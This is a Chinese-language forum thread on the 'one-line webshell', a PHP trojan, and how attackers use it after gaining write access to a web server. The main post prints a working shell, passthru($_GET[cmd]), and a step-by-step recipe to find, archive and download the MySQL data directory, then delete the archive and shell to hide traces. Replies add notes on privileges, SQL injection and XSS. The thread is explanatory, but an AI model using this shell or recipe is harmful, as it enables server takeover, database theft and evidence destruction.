Re: [问题] 一句话木马

楼主: asimon (逞˙强)   2019-05-26 04:20:35
<恕删>
: → newnovice: 请教st大 所以这个w算是拿到os的root shell吗? 也能执 05/24 23:03
: → newnovice: 行任何数据库的捞取? 05/24 23:03
: 推 st1009: 嗯,没意见,应该是可以转,晚点转转 05/24 23:25
: → st1009: 这个w有没有取得root权限要看被注入木马的档案本身的权限 05/24 23:26
: → st1009: ,一般而言,普通的档案是不会有root权限的,如果操作正常 05/24 23:27
: → st1009: ...我是有听说过有不少人没事就给PHPmyadmin root 然后被 05/24 23:27
: → st1009: 人用这个REC时就Q了XDDD 05/24 23:27
: → st1009: 以PHP为例,通常没有意外的话,一个PHP是可以捞取DB,如果 05/24 23:28
: → st1009: 没有特别控管是可以执行任何数据库的捞取没错 05/24 23:29
: → st1009: 不过专业点的会把DB分段,这时就只能捞有权限的那段了 05/24 23:30
: ※ st1009:转录至看板 CyberSecure 05/24 23:31
: 推 st1009: 是说我有些用词没有很精确,不要太在意>"< 05/24 23:35
: 推 asimon: 楼上怪怪的.. 该说执行木马者的执行权限吧? 05/26 03:36
: → asimon: 虽然备注入木马的.php是ooxx:ooxx但如果apache是root执行, 05/26 03:37
: → asimon: 还是会拿到root权限.. 同样的, 如果从mysql执行系统指令, 05/26 03:37
: → asimon: 看的就是mysql的服务是谁启动的, 如果用appserv, 全部跑 05/26 03:37
: → asimon: administrator当然就... ((请自行想像.. 05/26 03:38
: 推 asimon: 然后楼上提到拿到一句话的权限是否能不能捞DB.. 05/26 03:40
: → asimon: 如果DB另外有设密码, 就要另外破密码.. 05/26 03:40
: → asimon: 回文好了.. 05/26 03:41
从这边开始说好了..
首先, 一句话木马其实是挂网马的一个特例..
什么是挂网马? 简单说就是恶意攻击者想办法在受害者的网页上嵌入一个网页型木马..
这边又多了一个名词, 网页型木马?
就是可以让非管理者做一些本来只有管理者能做的事情..
例如:
1) R: 读目录列表或档案 网页根目录下 或 系统路径
2) W: 写入东西, 修改东西 一样可分网页根目录下 或 系统路径
3) X: 执行东西, 一样可分网页根目录下 或 系统路径
而一句话木马表示这只网页型木马只有一行字...
至于影响多严重就看权限问题了..
如果我们在M$家族, 常常都是看到Administrators打天下..
爽了, 得了Administrators就等于得天下..
在Linux下, 看RWX的权限, 我们通常知道, UN*X下面没意外没有Chroot的话,
大家通常都是可以看大部分档案的(除了home / root / shadow等少数特定地方外)..
所以如果很多时候, 如果有办法在web根目录挂一只网马, 通常离破台不远了..
怎么这么说呢? 我们还是以php为例,
今天如果看到目标网站上有可以挂马的弱点,
常常是可以在某网页上写入任意字符, 且写了<? ... ?> 标签后可以执行..
我们常常有两种做法:
1) 比较搞刚的做法:
塞一个php上传器上去(反正找php上传档案很多范例),
接着利用这个上传器上传一个完整的网页型木马,
这样上去的木马就有超级多功能了,
以下是我看过可以在php网页做到的:
档案总管 / 工作管理员 / CMD / 上传下载器 .. 这些都很普遍的了 ..
阿最后就用档案总馆去看看要怎么挖mysql这样..
后来, 传两次马很麻烦, 我们也懒得拿多拿肉鸡,
反正挂了马还是要自己擦屁股, 这么搞刚没啥意思..
因此我们后来都用懒惰的作法..
2) 比较懒惰的作法:
一招闯天下, 只要确定以下项目: 1. 可以读写档 2. 可以执行指令 就够了..
我们常确定可以读写档又可以执行指令后,
就重复用一句话指令做一些事情, 拿到整个db就结束..
以下没有参考纪录, 是凭空打的懒得加跳脱字符, 看得懂就好:
首先写入网马如 <? passthru($_GET[cmd]); ?> 到某个php
a) tree / |grep mysql (拿到mysql家目录路径
b) tar -zcvf /[上面看到的路径]/mysql ./mysql.tar.gz
c) 下载 http://[网页路径]/mysql.tar.gz
d) rm ./mysql.tar.gz ; rm ooxx.php
直接把整个db路径打包下载顺便擦屁股,
好几个愿望一次满足, 当然mysql可以换成任意想得到的关键字.. 结案 xDa
从这里知道, 被挂马是件很麻烦很严重的事!
因为如果可以被挂马, 搞不好每个角落都被看光了,
更惨的搞不好不知道被藏了多少马这样..
大概就是这个状况, 提供大家参考..
听说这是骗P币 xD
Best Regards,
by ASimon
楼主: asimon (逞˙强)   2019-05-26 04:21:00
才发现这是这边版的首PO, 我其实很低调的, 多多指教~! 0_0
作者: hpyhacking (骇人听闻)   2019-05-26 11:06:00
请问挂马的方式是像XSS那样例如说留言板还是什么之类的吗
楼主: asimon (逞˙强)   2019-05-26 13:11:00
这是其中一种方法.. 只要挂得上去的都可以..反正只要达到最终目标: 在网页上写入可以让攻击者执行额外程式的程式码就是了..
作者: st1009 (前端攻城师)   2019-05-27 17:14:00
要用php一句话的话,基本上都是写进去的,不会用xss,倒是可能用Sql injection让phpmyadmin去写,所以没事时那个要关掉比较好其实大佬告诉我不要用phpmyadmin但他真的太好用了...
楼主: asimon (逞˙强)   2019-05-27 18:28:00
早年还是有看到在留言板写的.. 算xss吗? O_o
作者: CMJ0121 (请多指教!!)   2019-05-27 20:58:00
XSS 应该还是偏 JavaScript 当作进入点
作者: st1009 (前端攻城师)   2019-05-27 21:45:00
应该是储存型的XSS,但是功能相对较低,比较好的作法是进行网页钓鱼,或者偷token

Links booklink

Contact Us: admin [ a t ] ucptt.com